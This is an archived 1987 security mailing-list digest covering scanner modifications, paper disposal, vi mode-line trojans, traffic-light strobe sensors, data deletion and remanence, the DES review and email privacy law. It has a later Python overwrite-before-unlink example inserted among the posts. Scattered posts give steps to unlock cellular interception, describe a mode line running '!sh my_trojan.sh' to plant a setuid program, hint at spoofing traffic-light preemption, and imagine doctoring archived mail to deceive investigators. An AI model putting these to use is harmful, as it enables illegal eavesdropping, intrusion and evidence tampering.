barnett@ge-crd.arpa, barnett@steinmetz.uucp
...!{chinet,rochester}!steinmetz!barnett

From: Michael Grant  16-Mar-1987 18:29:01
To: info-hams@mc.lcs.mit.edu, rnj@brl.arpa, security@red.rutgers.edu
Subj: Restoring Cellular Coverage on the Radio Shack PRO-2004 Scanner

In the March 1987 (Vol 6, Number 3) issue of Monitoring Times on page 48, there is a short article on how to modify your RadioShack Scanner to pick up the cellular frequencies. (This just had to have been leaked from someone in Tandy sales!)

1. Remove the four cabinet screws and the cabinet
2. Turn the receiver upside down and locate circuit board PC-3
3. Remove seven screws holding board and plug CN-501
4. Carefully lift up the board and locate diode soldered in place below the module
5. Snip one lead of the diode carefully, leaving it suspended by the other lead for later reattachment if desired, such as warranty repair
6. Reverse first four steps above for reassembly.

Radio will now cover 825-845 and 870-890 MHz and search in 30 KHz increments for no-gap 760-1300 MHz reception. (Thanks to Jim Marquand and other readers of Monitoring Times.)

I do not own a PRO-2004, nor have I ever seen this tried; do it at your own risk.

-Mike

From: *Hobbit*  17-Mar-1987 00:57:52
To: security@RED.RUTGERS.EDU
Subj: [947] Better than shredders

I have found an excellent way of disposing of classified garbage. You find a standard industrial-grade flat rooftop that has a lot of small-grain gravel on top, and sweep a small pile of it together. Create a depression in this pile, about 6 inches across. Loosely crumple a couple of the papers in question and ignite them. Feed the rest of the stuff in, loosely crumpled so it burns nicely, until there's only ashes and no paper left. Now, tumble and mix the pile of gravel and ashes around until all you have is blackened gravel [a random beer bottle lying nearby served quite well as a swizzle stick]. Leave the pile sitting there for the next time you need it.
Drawbacks: Works better at night, since rooftops tend to be windy during the day. However, what's left behind is completely unreadable.

_H*

From: codas!ki4pv!tanner@rutgers.edu  19-Mar-1987 11:59:15
To: codas!moss!rutgers!security
Subj: Trojan Horses in Editor Start-Up Files

Another interesting case is "vi", whose mode lines feature is disabled by SCO ("it's not a bug, it's a feature") because they fear that someone might leave a trojan horse in a file to be edited. SCO sells xenix, which is a unix clone of moderate tolerability.

A mode line containing the command "!sh my_trojan.sh" surrounded by the proper arrangements of comment characters and colons is what they fear; my_trojan.sh either dispenses a prophylactic to the editor, or creates a setuid-victim prog for benefit of the horse's owner.

I fear that the commenting-out of the proper code (rather than simply disabling the '!' command in mode lines) is probably more than a bit paranoid; SCO was kind enough to offer to sell me source for some large number of thousands of dollars so that I could re-enable this code. Their hack is not optional on a per-site basis; they don't offer a version with mode lines to those sites willing to risk it.

I prefer the simpler policy of cutting off the fingers of anyone who leaves a trojan horse around without my permission.

tanner andrews, systems
compudata south, deland

From: Douglas Humphrey  20-Mar-1987 11:07:41
To: brock@pnet01.CTS.COM, crash!security@rutgers@nosc.mil
Subj: [1520] Re: North, Pointy, et al (so to speak)

All I can say about it is that if they had been running OUR system rather than PROFS then their messages really would have gotten deleted! Still, I would think that an organization like the NSC should have the proper support by agencies to avoid such a simple, stupid problem. I don't expect our customers to be knowledgeable about these things; that's what they pay US for. What agency is charged (if any) with the job of COMSEC and related security?
Would that be NSA?

A thing to note here. They did have correct levels of security there, with the entire facility Tempest, and running at Top Secret. The problem here is not one of classic COMSEC; the bad guys getting into the system. What happened here was the creation of an audit trail when the users did not want one to happen. You can argue that this kind of accountability is good or not; it did allow what actually happened to come to light (no political flames here please, this is just a technical discussion), but it can also be argued that the user is the ultimate authority in the circumstance, and that when they say 'delete and do not archive' then that is what should happen. If there was a decision taken that the system should auto-archive all message traffic, then the users should have been explicitly warned of this, and often!

Doug
Digital Express Inc.

From: steinar@NTA-VAX.ARPA (Steinar Haug RUNIT)  23-Mar-1987 09:10:31
To: security@RUTGERS.EDU
Subj: [631] Standard format for RSA cryptosystems

I would like to know if there have been any reactions, discussion etc. regarding the article: "A proposed standard format for RSA cryptosystems", by P. Zimmermann, IEEE Computer, September 1986.

Steinar Haug
Arpanet: steinar@nta-vax
Database Research Group, Computing Centre at the Univ. of Trondheim
7034 Trondheim-NTH
Norway

From: "IFSM 190/0101; Student"  25-Mar-1987 21:38:56
To: "security"
Subj: [787] disposing garbage

Why not use an incinerator where the ashes are recycled back into the fire a couple of times..... and then the smoke is sprayed with a mist of water to keep paper particles from leaving the area and reburned until the whole mess was up in flames.... then you could release it... this would only be effective for large(!!!) massive amounts of classified material...

does anyone know anything about the unix hacker that is moving passwords around the country? he gets a file from NJ and moves it to NY and then the ppl can't log on w/ their own passwords....
I didn't hear the whole story but that's what I gathered.

Whizard

From: Mike Linnig  27-Mar-1987 15:29:50
To: security@rutgers.edu
Subj: [727] Traffic Light Sensors

Does anyone out there know anything about the photo sensors that you can see on top of traffic lights? I have heard that they detect emergency vehicles (who use a special strobe) and switch the traffic light to green. Are the strobes coded or do the sensors just detect a certain flash frequency? I tried watching the strobe of an emergency vehicle but it is too fast to tell much without a video tape. The strobe's flashes do seem to be in irregular bursts, indicating a code of some kind. I also wonder if the codes change (if they are coded) from city to city?

Mike

From: *Hobbit*  8-Apr-1987 21:12:09
To: security
Subj: [519] Administrivia

Resending has sagged a bit due to the domain-names-only host table conversion. I therefore had to fix *my* entire list so it would work again, and naturally there were some additional quirks. I think I have it straight now, but please notify security-request of any problems. Most mailer errors return to me, but if you get any consistent ones please forward them... Hang on, here comes lots of stuff!

_H*

From: Chris Yoder  1-Apr-1987 04:24:38
To: cit-vax!security@red.rutgers.edu
Subj: [2922] System monitoring software

(For those of you who get both Info-Vax and Security-Info I apologize for the double posting. I thought that this might be a good place to post this message, and besides that, we need some traffic in this group!)

I would like to get comments from anybody about system monitoring software that runs under VMS 4.5. I'm specifically interested in software that will record everything that happens during an interactive terminal session in a manner that is completely transparent to the user. Analysis tools to help pinpoint users that may be considered "security risks" from the recorded data are also necessary.
I am interested in hearing about how the package is installed (including where the software ends up, what software is installed, what kinds of privs it wants, etc.), how well the package works (both software and documentation), any holes/serious bugs that you've found and any personal opinions that you might have about the software.

On the more specific side, I have just finished evaluating Clyde Digital Systems' CONTRL, AUDIT and RTMON software packages, and I'd like to share war stories with anyone else who has or is running any or all of these packages (I've a *long*, very rough report on it, but if you want it send me mail). CONTRL is fun, but I am most interested in AUDIT and RTMON.

While running AUDIT with RTMON under it, Vaxsim showed that our system was collecting a rather alarming number of SysBugChk (%x00000058) Events. Before and after the evaluation period of AUDIT and RTMON *no* events were being logged by Vaxsim; during the evaluation period I saw this number above 4,000. We suspect RTMON as the culprit because the system crashed once during this period with the current process being a process that was logged in over DECnet, and analyzing the crash dump showed that the crash was caused by R5 being set to 0. Circumstantial evidence seemed to indicate that UPdriver caused R5 to be set to 0. Has anyone else been able to pin down UPdriver of the RTMON package as the culprit for a system crash or an unusually high number of errors on the system?

Oh, I also discovered another gotcha: with both CONTRL and RTMON installed under VMS 4.5, the process running CONTRL will crash the system when CONTRLing a user logged in on a virtual terminal over a terminal server who disconnects. I haven't tried to deliberately recreate this one because users tend to get a little upset when the system goes down for no apparent reason... If anybody else has had any similar experiences, I'd love to hear about them.
-- Chris Yoder
UUCP -- {allegra or ihnp4}!scgvaxd!engvax!chris
Hughes Aircraft Company
Internet -- chris%engvax.scg.hac.com@ymir.bitnet
ARPA -- chris%engvax.uucp@usc-oberon.usc.edu

From: chuq@Sun.COM (Chuq Von Rospach)  3-Apr-1987 15:48:07
To: LINNIG@ti-eg.csnet, security@rutgers.edu
Subj: [599] Re: Traffic Light Sensors

> Does anyone out there know anything about the photo sensors that you
> can see on top of traffic lights?
>
> I have heard that they detect emergency vehicles (who use a special strobe)
> and switch the traffic light to green.

They use a strobe. If you have a nice, strong engine timing light and set it up so you can change the frequency, you adjust it so that it'll set them off. I wouldn't let the cops catch you doing it, though...

From: Dick Peters  3-Apr-1987 18:12:46
To: SECURITY@RED.RUTGERS.EDU
Subj: [1377] Re: North, Pointy, et al (so to speak)

Since we run PROFS ourselves, I do not think the problem was that stuff was not actually deleted from the system when the files were erased. PROFS actually does erase mail files when they are discarded. From the sources I talked to at a recent conference, I believe they fell into the trap of good system management. In order to prevent massive data loss in case of a disaster, their system management does periodic backups of all files (including mail files) on the system. These tapes are retained for a period of time and then recycled. In fact, my source said that the critical tapes were almost ready to be recycled when they were examined.

On the other side of the coin, one of IBM's big selling points on PROFS is that in a properly managed data center, PROFS prevents the loss of corporate assets (data) by accidental or intentional actions since the data is managed by a central site rather than being on a PC. All their documentation states that for non mail files (i.e. document files), these files are maintained centrally and will not be lost even if removed by the user.
My understanding was that the discovered files were, however, mail files rather than document files.

From: "Keith F. Lynch"  4-Apr-1987 15:46:29
To: Security@RED.RUTGERS.EDU
Subj: [1443] Deleting messages

I wouldn't be so sure that messages are really deleted. I understand there are ways to reconstruct OVERWRITTEN data on a disk, given sufficient time and resources. SECRET disks must be overwritten several times with various bit patterns before being unclassified, and SCI disks must be physically destroyed.

Users' desires are often in conflict. They may want deleted things to be really deleted, but they probably also want a way to recover something that was accidentally deleted. The usual resolution of this is to fix it so that deleted things are not really deleted, but can only be recovered by the vendor. This may be construed as dishonest, but the only way the client would ever find out that deleted things aren't really deleted is if he asks you to undelete something, or if the authorities ask you to undelete something. In the latter case, while you may lose the clients, it doesn't really matter since they are quite likely in jail.

And what if you deliver a system which REALLY deletes things, but the local system staff does regular backups, or the end user reads his messages in hardcopy and then files them in a filecabinet or a dumpster? True deletion requires a complete overview, which neither the vendor nor the end user or the local system staff generally has.

...Keith

From: Simson L. Garfinkel  5-Apr-1987 11:54:24
To: security@red.rutgers.edu
Subj: [886] Trojan Horses in Editor Start-Up Files

> From: codas!ki4pv!tanner@rutgers.edu
> I prefer the simpler policy of cutting off the fingers of anyone who leaves
> a trojan horse around without my permission.

Assuming that you find out that somebody left the trojan horse around in the first place.
The clever people who break security don't announce the fact -- they just use their extra access whenever necessary, always very discreetly. If I have a setuid program that makes me you so I can do things like read your personal files, and I hide it in a protected sub directory, how are you going to find out that I'm reading your personal files? How often do you look at the last access time on filestamps?

Simson L. Garfinkel
MIT Media Lab

From: Douglas Humphrey  4-Apr-1987 21:25:16
To: Security@RED.RUTGERS.EDU
Subj: [1883] Re: Deleting messages

In the system that we have here, you have the choice as the sender of the message to determine if you want the ARCHIVE bit set on or not. The ARCHIVE function assures that the message will get logged as archived in a list online, and that the end of the day Archive tape will include this message. Note that the archival tapes are encrypted, and that two copies are kept, one onsite and one off. U can have the bit set automatically for certain classes of messages, but in all cases the system will remind you that the message is getting archived.

As to erasure of deleted messages, the standard guidelines are followed for the deletion of Secret information. A number of passes are made on the file blocks, writing selected patterns of data. All to the recommendations of the folks up the Parkway from here (we are in Greenbelt MD). If the system were ever to handle SCI or higher data, then provisions would have to be made to destroy disk storage media when it had filled up, and of course to assure that once a disk block was used it was not used again. The system already has the capability to use a particular disk device for a particular class of message.

Obviously, the important thing here is that the user needs to be very aware of exactly where their data is going, and what is being done with it when it is sensitive data.
If North and company had known that all of their wonderful data was going to be around for people to see, then I expect that there might have been held an emergency destruction drill at the NSC office that might have included the system hardware itself! Since they are running IBM and PROFS, this would seem to be no great loss.... Let's hear it for a better educated user community!!

Doug

From: E Gordon Strong <@EDDIE.MIT.EDU:GS@DEEP-THOUGHT.MIT.EDU>  6-Apr-1987 13:38:20
To: security@RED.RUTGERS.EDU
Subj: [704] Unix Security info requested

Could someone provide pointers to recent papers/books/etc addressing the question of security under unix? I am particularly interested in information relating to NCSC ratings of unix-based systems. Information on available security software (auditing programs, security kernels, etc) or any first-hand information on sites running "secure" installations would be very helpful. Any information would be appreciated. Please reply directly as I am not a regular reader of this list.

Gordon Strong
gs%ee@mit-xx (Arpa)
gs@mit-eddie (uucp)

From:  7-Apr-1987 10:24:35
To: security@red.rutgers.edu
Subj: [4710] don't put out a welcome mat

There have been some security related discussions on the TCP-IP mailing list recently, as a result of somebody accidentally sending a message to just about every machine on the internet. I found the implications of the last part of the following message rather disturbing, and thought it should be shared with the readers of "security".

Selden Ball
system@crnlns.bitnet

------------------
Date: Mon, 06 Apr 87 10:55:12 -0800
From: Robert Allen
Subject: Re: My Broadcast

> Whoa!
>
> Encouraging people to find holes and then use them to make the local system
> programmers work on them is wrong. It is like encouraging people to find out
> if their neighbors lock their door during the day so they will. Do you really
> want that or do you want the thieves to be caught?
> I want the thieves to be
> caught and the ability to leave my door open. I don't want to fear my
> neighborhood or my users.

While this doesn't deal directly with TCP-IP, it is a *very* important consideration in the Internet in particular, and any network in general. Often a so-called 'breakin' does not even require that a user maliciously "try their neighbors' doors" to see if they can gain restricted permissions or access. Often curiosity alone is enough to cause problems.

Example 1: a first-time UNIX user was learning about the file system, and in particular how to delete files. He was told that he could only delete files owned by him, and by way of counterexample his mentor typed "rm /etc/passwd". Surprise, /etc was writeable and the file was gone.

Example 2: the recent rlogin breakins at Stanford.

Example 3: Obviously if you have hardware access to the transmission medium you can unintentionally wreak havoc merely by using someone else's IP address.

I too would like to live in a world where I can leave my "door unlocked". Unfortunately it doesn't take more than a very few nasty or ignorant persons to cause problems. Due to the fact that computers have evolved in an atmosphere of sharing (time sharing, memory sharing, src sharing..) we have yet to realize the responsibilities and risks of trusting them too much. I.e., there is a big difference between leaving your door unlocked but closed, and spreading $20.00 bills on your front lawn. In the case of J. Hubbard's 'wall' to the Net, the problem was not caused by a malicious person, but by simple curiosity.

At the recent TCP/IP Conference in Monterey CA, some discussion was given to "network security". From the military standpoint they want the ability to send data through a network, such that anyone who captures the data won't be able to read or use it. While this may be a prerequisite for the military, I don't think that 'normal' users should expect that their Email be any more secure than their USMail.
The best method of keeping something secure on a network is to physically separate it. Or, do what I do, and don't put anything on the system which you wouldn't want read by someone else under the worst case scenario. Fixing security 'features' is obviously important, and should be pursued. Catching malicious persons doing damage is also extremely important. But "catching the thieves" is not the answer to a lack of network security. If your network rolls out a red-carpet to someone then don't be surprised if you find muddy footprints on it the next morning.

I leave you with two examples quoted from the January 1987 issue of the ACM Software Engineering Notes...

"The computer security administrator at Roche ... had been plagued by a hacker who auto-dialed the entire Roche phone system in sequence. .... They laid a hacker trap on one of the PC's and traced the call. Once the suspect was found, it was even harder to get him arrested since he was in New York, and Roche in New Jersey (which got the FBI involved). The perp was brought into the police station and had the riot act read to him... He was not charged -- because there wasn't a **no-trespassing** sign on the hacker trap identifying the system as private property of Roche."

" "Welcome to the ______ System" ... A Mass. financial firm that had attempted to prosecute a hacker who had penetrated their system. The defense lawyer argued that the system had a greeting that welcomed people to the system, and that was tantamount to welcoming someone into your home. The judge threw out the case, accepting the arguments of the defense.."

Robert Allen, robert@spam.istc.sri.com

From: McNelly.OsbuSouth@Xerox.COM  9-Apr-1987 13:05:28
To: brock@pnet01.CTS.COM
Subj: [1159] Re: North, Pointy, et al (so to speak)

You know, I heard about that, and I said to myself, boy that was stupid, if it had been ME... and I started thinking.
If it had been me, first of all, I would have told the President what a stupid idea it was to provide Iran with arms in exchange for hostages. But NoooOOooOoo, he does it anyway, and now we've been found out. I would do what I could to protect the presidency. I would do that by shredding all the incriminating paper evidence. But I know there's going to be an investigation, and people are going to want to know why I shredded this stuff if there's nothing to hide. This is the beauty. I get the archived hard disks, and I patch the mail messages to say something that, while still incriminating, isn't so bad as the full-blown truth. I then wait for the disks to be discovered. The investigators eventually find the disks, and they laugh at me for being so stupid. But the joke's on them, if they think that archives can't be tampered with.

John McNelly
McNelly.osbuSouth@Xerox.COM

From: David M. Balenson  10-Apr-1987 14:50:35
To: security@RUTGERS.EDU
Subj: [4438] DES Second Review

For your information, here is a copy of the Federal Register Notice regarding the second review of Federal Information Processing Standard (FIPS) 46, Data Encryption Standard (DES). If interested, please submit your written comments by June 4, 1987. The more comments we receive, the better NBS will be able to take a stance regarding the future of DES. Please feel free to distribute this notice to all who may be interested. Thank you.

David M. Balenson (DB) [balenson@icst-ssi.ARPA]
Security Technology Group / Computer Security Division
National Bureau of Standards
Technology A216
Gaithersburg, Maryland 20899
(301) 975-2910

----------------------------------------------------------------------
Federal Register / Vol. 52, No. 44 / Friday, March 6, 1987 / Notices
----------------------------------------------------------------------

National Bureau of Standards

[Docket No.
70109-7009]

Second Review of Federal Information Processing Standard 46, Data Encryption Standard (DES)

AGENCY: National Bureau of Standards, Commerce.

ACTION: Notice of second review of federal information processing standard (FIPS) 46, data encryption standard.

----------------------------------------------------------------------

SUMMARY: Federal Information Processing Standard 46, Data Encryption Standard, issued in 1977, provides an algorithm to be implemented in electronic hardware devices and used for the cryptographic protection of computer data. The standard provided that it be reviewed within five years to assess its adequacy. The first review was completed in 1983, and the standard was reaffirmed for Federal government use (48 FR 41062 dated September 13, 1983). The purpose of this notice is to announce the second review to assess the continued adequacy of the standard to protect computer data. Comments from industry and the public are invited on the following alternatives for FIPS 46. The costs (impacts) and benefits of these alternatives should be included in the comments.

o Reaffirm the standard for another five (5) years. The National Bureau of Standards would continue to validate equipment that implements the standard. FIPS 46 would continue to be an approved method for protecting unclassified computer data against unauthorized modification or disclosure.

o Withdraw the standard. The National Bureau of Standards would no longer continue to support the standard. Organizations could continue to utilize existing equipment that implements the standard, and non-government organizations could continue to develop new implementations as desired. Government organizations would begin to utilize new security devices as they become available through the Commercial Communication Security Endorsement Program of the National Security Agency.

o Revise the applicability of the standard.
The applicability statement of the standard would be changed to specify certain uses, such as using the standard for protecting Electronic Funds Transfers.

Proposed technical changes to the algorithm will not be considered during this review.

Interested parties may obtain a copy of FIPS 46 from the National Technical Information Service (NTIS), 5285 Port Royal Road, Springfield, VA 22161, telephone (703) 487-4650.

DATE: Comments on this second review of FIPS 46 must be received on or before June 4, 1987.

ADDRESS: Written comments concerning this standard should be submitted to the Director, Institute for Computer Sciences and Technology, ATTN: Second Review of FIPS 46, Technology Building, Room B154, Gaithersburg, MD 20899. Written comments received in response to this notice will be made part of the public record and will be made available for inspection and copying in the Central Reference and Records Inspection Facility, Room 6628, Herbert C. Hoover Building, 14th Street between Pennsylvania and Constitution Avenues NW., Washington, DC 20230.

FOR FURTHER INFORMATION CONTACT: Dr. Dennis Branstad, Institute for Computer Sciences and Technology, National Bureau of Standards, Gaithersburg, MD 20899, (301) 975-2913.

Dated: February 26, 1987.
Ernest Ambler, Director
[FR Doc. 87-4707 Filed 3-5-87 8:45am]
Billing Code 3510-CN-M
----------------------------------------------------------------------

From: ag@pnet01.CTS.COM (Keith Gabryelski)  11-Apr-1987 15:59:23
To: crash!security@rutgers.arpa@nosc.mil
Subj: [608] Re: Deleting messages

Granted, your typical delete-a-file function does not actually erase the data from the disk, but actually marks the space as unused for later reallocation. This, however, has an easy remedy: You would simply modify your delete function to first overwrite the file with zeros, or your favorite ASCII character, before it marks the space as 'unused'. This process would ensure that a file that is deleted would be completely erased from the medium.
Pax, Ag

From: bzs@bu-cs.bu.edu (Barry Shein) 12-Apr-1987 13:38:53
To: KFL@AI.AI.MIT.EDU
Subj: [1290] Deleting messages

I've seen an amusing variation at some installations. Typically, for some reason (which seemed clever at the time), the system's mgt decides to use a tape archive (eg. UNIX CPIO or TAR) to do backups rather than some rational utility. A good example of a reason is that you can use a 'find' pipe with CPIO and back up files only if they meet some condition which, if you like, can be quite convoluted (> N days old, > N bytes, !owned by system etc), usually to save tape and backup time.

Well, these utilities back up files, but not deletions. If a disaster occurs and the system has to be recreated one sees all the deleted files return to disk with whatever protections they happened to have when backed up. Needless to say someone who (eg) was going on sabbatical for a year and cleaned up all their sensitive files might be somewhat miffed to come back and find they had been sitting back on the disk for the past 11 months.

Obviously the fix is to also backup recent copies of the state of the directories and apply those last, but this doesn't seem to be done by these sites when they report problems on the technical lists.

-Barry Shein, Boston University

From: "Keith F. Lynch" 12-Apr-1987 17:45:51
To: Security@RED.RUTGERS.EDU
Subj: [2239] Reconstructing overwritten data

I don't know exactly how. I think it involves careful measurement of residual magnetism. For instance if the magnetism of a binary 0 is nominally -100 and of a binary 1 is nominally +100, then a 0 overwritten with a 1 might be +98, a 0 overwritten with a 0 might be -102, a 1 overwritten with a 0 might be -98, and a 1 overwritten with a 1 might be +102.
A normal disk drive might accept anything less than -30 as a 0 and anything more than +30 as a 1, but a special disk drive could be built which reads the actual amount of magnetism, and software could then be written to use this drive to reconstruct erased data. (The actual details would be a little different - I think most disk systems use a transition between magnetic domains to encode a bit, not the domains themselves.) I know there are similar devices in use for reconstructing data from a damaged or crashed disk. I understand they are extremely slow and very expensive, but they do exist, and they do work.

The way to REALLY delete data is to overwrite it with all 0s, then overwrite it with all 1s, and then overwrite it with a random pattern of bits. This is how disks classified SECRET must be erased to be declassified. But apparently it is believed that a sufficiently determined person could even read through this, as disks containing data with a higher classification must be destroyed to be declassified.

Of course most DELETE, KILL, PURGE, DEL and rm commands do not even overwrite the data, but simply remove the pointer to it. Which is how it is possible for programs like the Norton utilities to undelete a deleted file. This was a major problem with VMS before version 4.0 - a user could (and still can if the system manager isn't on the ball) create a large file and not write into it and read lots of other people's deleted files.

Everything above applies equally to hard disks, floppy disks, magnetic tapes, and magnetic core - not to RAM or ROM though.

North et al. had their mail files read not by any of these techniques but simply from backups that were routinely made.
...Keith

From: bzs@bu-cs.bu.edu (Barry Shein) 12-Apr-1987 21:19:25
To: Security@RED.RUTGERS.EDU
Subj: [596] Deleting files

The other problem with backup procedures that don't backup deletions is lord help you if the disk was almost full when the disaster struck and the restoral exceeds 100% of the disk (as you needed those deletions to make it all fit, not uncommon as often almost full disks get preened constantly to fit the next thing on.) The resulting games when the restoral utility fails due to a full disk are generally not a pretty sight (site?)

-Barry Shein, Boston University

From: Michael Robinson 14-Apr-1987 02:09:34
To: SECURITY@RED.RUTGERS.EDU
Subj: [780] Re: Trojan Horses in Editor Start-Up Files

> From: codas!ki4pv!tanner@rutgers.edu
>
> I prefer the simpler policy of cutting off the fingers of anyone who
> leaves a trojan horse around without my permission.
>                              ^^^^^^^^^^^^^^^^^^^^^

Now there has to be some interesting psychology in that, although I'm sure that the writer didn't notice. What would prompt him to give his permission to anyone to do such a thing? And what would give him the authority to say?

The best of security systems are viewed from the outside and pronounced invulnerable. But they are most easily attacked from the inside.

From: 11-May-1987 08:29:49
To: security@red.rutgers.edu
Subj: [1514] Electronic mail privacy

I just received the following message. Does anybody have any more information?

Selden E. Ball, Jr.
(Wilson Lab's network and system manager)

Cornell University                 NYNEX:  +1-607-255-0688
Laboratory of Nuclear Studies      BITNET: SYSTEM@CRNLNS
Wilson Synchrotron Lab             ARPA:   SYSTEM%CRNLNS.BITNET@WISCVM.WISC.EDU
Judd Falls & Dryden Road           PHYSnet/HEPnet/SPAN:
Ithaca, NY, USA  14853             LNS61::SYSTEM = 44283::SYSTEM (node 43.251)

****************

From: Jerry Bryan
Subject: Respite from 80-column wars
To: SELDEN BALL

The following is a (partial) quote from an IBM ad I saw in the April 27th issue of "InformationWeek".
I assume it will (or has) run in many other periodicals as well.

"Good news for those who value privacy ...... Thanks to recent legislation, the laws that cover data security now cover more. There are stiff new penalties and new protections. Prying into electronic mail is now as criminal as opening the U.S. Mail and even the government cannot intrude without a warrant...."

"... as criminal as opening the U.S. Mail ..." is pretty heavy stuff. Does this have anything to do with BITNET? Is this the correct list on which to raise such a question (e.g., what about discussions of mail encryption, etc.)?

From: Henry Mensch 13-May-1987 15:07:20
To: security@RED.RUTGERS.EDU
Subj: [2617] Re: The Electronic Communications Privacy Act

This is what the MIT community (in general) was told about how this law affects our work. It sounds to me like the ECPA is talking about BITNET also. (Of course, the Act has no clue about "ownership" of data--they don't ever seem to define it). This is a copy of a letter published in Tech Talk. Anyone who did not read that memo should read it. Be sure to note that operators of electronic communication systems now have legal responsibilities for the privacy of data.

[Thanks also to Joe Harrington who forwarded a copy. _H*]

MEMORANDUM
To: The MIT Community
From: James D. Bruce, Vice President for Information Systems
Re: The Electronic Communications Privacy Act

The Electronic Communications Privacy Act of 1986 was enacted by the United States Congress in October of last year to protect the privacy of users of wire and electronic communications. Legal counsel has advised MIT that its computer network and the files stored on its computers are covered by the law's provisions. Specifically, individuals who access electronic files without appropriate authorization could find themselves subject to criminal penalties under this new law.

At this time, we can only make broad generalizations about the impact of the Act on MIT's computing environment.
Its actual scope will develop as federal actions are brought against individuals who are charged with inappropriate access to electronic mail and other electronic files. It is clear, however, that under the Act, an individual who, without authorization, accesses an electronic mail queue is liable and may be subject to a fine of $5,000 and up to six months in prison, if charged and convicted. Penalties are higher if the objective is malicious destruction or damage of information, or private gain.

The law also bars unauthorized disclosure of information within an electronic mail system by the provider of the service. This bars MIT (and other providers) from disclosing information from an individual's electronic data files without authorization from the individual.

MIT students and staff should be aware that it is against Institute policy and federal law to access the private files of others without authorization. MIT employees should also note that they are personally liable under the Act if they exceed their authorization to access electronic files.

From: Dick Peters 13-May-1987 16:48:30
To: SECURITY@RED.RUTGERS.EDU
Subj: [762] Re: Electronic mail privacy

This clearly affects BITNET as it does any network. On the other hand, mail is as private on BITNET as any other network which does not employ encryption. On bitnet, mail is private and cannot be looked at by other general computing users on the system (at least the IBM portions). Just as on other systems, the privileged user (super-user), who is usually in the systems programming staff, can examine mail. I believe this flaw exists on most computing architectures. I believe that all installations will have to examine this law and determine the risks to their staff and organizations.
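Returning to the deletion thread earlier in this digest (Gabryelski's overwrite-before-unlink, and Lynch's zeros/ones/random passes): the remedy is easy to get subtly wrong. Open the file with truncation and you allocate fresh blocks instead of scrubbing the old ones; skip the fsync and the unlink can throw away dirty pages that never reached the disk. The following is an added example, not code from the list. It assumes a POSIX system and a filesystem that writes in place; on a journaling or copy-on-write filesystem, or on an SSD doing wear levelling, an in-place overwrite may land on different physical blocks, which is the modern form of the residual-data worry in the thread. The held descriptor in `residue_after` stands in for the still-readable blocks, since POSIX keeps an unlinked file's data reachable through any descriptor already open on it. The sample message is constructed.

```python
"""Overwrite-before-unlink, with a check that shows what a plain unlink leaves.

Added example, not code from the list. Assumes POSIX semantics: an unlinked
file's blocks stay readable through a descriptor already open on it, which
stands in here for 'the blocks still on the platter' without raw disk access.
"""
import os
import secrets
import tempfile

# The three passes described in the thread: all zeros, all ones, then random.
PASSES = (b"\x00", b"\xff", None)   # None means a fresh random buffer


def _write_all(fd, buf):
    """os.write may write fewer bytes than asked; loop until the buffer is out."""
    view = memoryview(buf)
    while view:
        n = os.write(fd, view)
        view = view[n:]


def plain_delete(path):
    """The typical delete-a-file function: drop the pointer, touch no data."""
    os.unlink(path)


def overwrite_and_unlink(path, passes=PASSES, chunk=1 << 16):
    """Overwrite the file in place once per pass, fsync each pass, then unlink.

    Returns the number of bytes overwritten per pass. Opening the existing
    inode read/write (not truncating) keeps the same allocated blocks on an
    in-place filesystem; fsync forces each pass out of the buffer cache so
    the final unlink cannot simply discard dirty pages that never hit disk.
    """
    size = os.path.getsize(path)
    fd = os.open(path, os.O_RDWR)
    try:
        for fill in passes:
            os.lseek(fd, 0, os.SEEK_SET)
            left = size
            while left:
                n = min(chunk, left)
                _write_all(fd, secrets.token_bytes(n) if fill is None else fill * n)
                left -= n
            os.fsync(fd)
    finally:
        os.close(fd)
    os.unlink(path)
    return size


def residue_after(delete_fn, secret):
    """Write `secret` to a temp file, hold a second descriptor open on it,
    delete with delete_fn, and return what that descriptor still reads."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "mail.txt")
    with open(path, "wb") as f:
        f.write(secret)
    peek = os.open(path, os.O_RDONLY)   # the "residual magnetism" stand-in
    try:
        delete_fn(path)
        os.lseek(peek, 0, os.SEEK_SET)
        return os.read(peek, len(secret) + 1)
    finally:
        os.close(peek)
        os.rmdir(tmpdir)


if __name__ == "__main__":
    msg = b"constructed sample: the contents of a deleted mail file"
    print("plain unlink leaves:     ", residue_after(plain_delete, msg))
    print("overwrite+unlink leaves: ", residue_after(overwrite_and_unlink, msg))
```

With `plain_delete` the second descriptor reads the whole message back after the file is gone; with `overwrite_and_unlink` it reads only the last pass. The `passes` argument lets a site that wants a deterministic final pattern (say, all ones) drop the random pass.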
From: wbaker%ic.Berkeley.EDU@BERKELEY.EDU 14-May-1987 08:28:42
To: Security@RED.RUTGERS.EDU@ucbvax.Berkeley.EDU
Subj: [1073] Re: Digest of accumulated msgs about traffic light sensors

So basically, nobody REALLY knows what's going on with these things, just there is a lot of folklore about them floating about. Not too useful if you ask me...

And to quote Doug Humphrey:

"... I doubt seriously that the pattern of a strobe light is used for IFF (sic) in the case of traffic controllers since strobe lights are hard to modulate reliably due to the fact that they are based on high voltage systems that generally use the ionization of gas to determine when the strobe goes off, and are thus not very accurate in a timing sort of way."

I might suggest you recheck your facts, and possibly reconsider. A visit to your local service station should be convincing enough, however if not then a trip to the local camera store might offer more evidence. A book on high-speed photography might also be in order; most book stores carry them.

Geezzzuuus.

W

From: Rob Aitken 14-May-1987 12:39:10
To: security@RED.RUTGERS.EDU
Subj: [595] Prying into electronic mail

Re: Recent quote from IBM ad in "InformationWeek"

Regardless of the legal penalties for prying into electronic mail, it seems to me that enforcement will be difficult if not impossible. The nature of messages makes them readily readable by anyone, much more akin to postcards than sealed letters. I will still refrain from mailing anything that I would not want in the public domain.

Rob Aitken, Alberta Research Council, Calgary AB

From: DAVID%NERVM.BITNET@wiscvm.wisc.edu (David Nessl, Univ. of Fla.) 14-May-1987 14:19:30
To: SECURITY@RED.RUTGERS.EDU
Subj: [2061] re: Electronic mail privacy

The IBM ad you read was talking about the Electronic Communications Privacy Act of 1986, passed by Congress on 02-Oct-1986, and signed into law on 21-Oct-1986, and became effective 90 days later. It's known as Public Law 99-508.
It's basically in two parts:

(1) Amendments to the existing U.S. Code, Title 18, chapter 119, starting with section 2510, which deals with interception of communications, formerly dealing with just the telephone (wiretapping), but has been updated to be more general: "common carrier" is now "electronic communications service provider", i.e. _any_ service which lets users send or receive electronic communications; and electronic communications are no longer limited to "oral", and now specifically include the use of computer facilities. Anyone intercepting, ordering the interception, or using the data from an interception, when not acting as the service provider for maintenance or protection of the system, is still committing a criminal offense, and can still be sued in civil court.

